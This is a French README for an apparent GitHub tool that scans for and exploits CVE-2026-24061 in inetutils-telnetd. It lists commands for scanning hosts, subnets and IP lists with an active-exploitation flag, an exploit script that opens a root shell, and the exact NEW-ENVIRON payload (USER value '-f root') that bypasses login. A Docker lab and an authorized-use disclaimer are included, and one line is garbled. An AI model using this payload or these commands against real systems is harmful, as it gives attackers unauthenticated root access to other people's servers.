
Scanner et exploit interactif pour CVE-2026-24061 dans inetutils-telnetd, permettant un accès root sans authentification via une négociation NEW-ENVIRON malveillante. Inclut un scan multi-threadé et un laboratoire Docker.
👨💻 Auteur : Furkan KAYAPINAR (@FurkanKAYAPINAR)
Ce dépôt contient un scanner de vulnérabilités et un exploit interactif pour CVE-2026-24061. Cette vulnérabilité affecte inetutils-telnetd (et potentiellement d'autres implémentations Telnet) via une gestion inappropriée de l'option Telnet NEW-ENVIRON, permettant un accès distant pré-authentification à l'aide de la charge utile -f root.
--exploitinetutils-telnetd pour des tests en toute sécurité.Assurez-vous que Python 3.x est installé.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Utilisation
Analysez les cibles pour détecter la vulnérabilité NEW-ENVIRON.
# Analyser une cible unique
python3 scanner.py -t 192.168.1.100 -p 1903
# Analyser un sous-réseau
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Analyser une liste d'adresses IP et tenter une exploitation active (vérification RCE)
python3 scanner.py -l ips.txt -p 1903 --exploit
Obtenez un accès interactif au shell root.
python3 exploit.py -t 127.0.0.1 -p 1903
Déployez un environnement vulnérable local pour les tests :
cd lab
docker-compose up -d --build
La vulnérabilité est déclenchée pendant la phase de négociation Telnet. En répondant à la requête DO NEW-ENVIRON du serveur avec un paquet de sous-négociation spécialement conçu IS VAR "USER" VALUE "-f root", le processus telnetd côté serveur est trompé et transmet l'indicateur -f root au processus login, contournant ainsi l'authentification.
[!WARNING]
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique.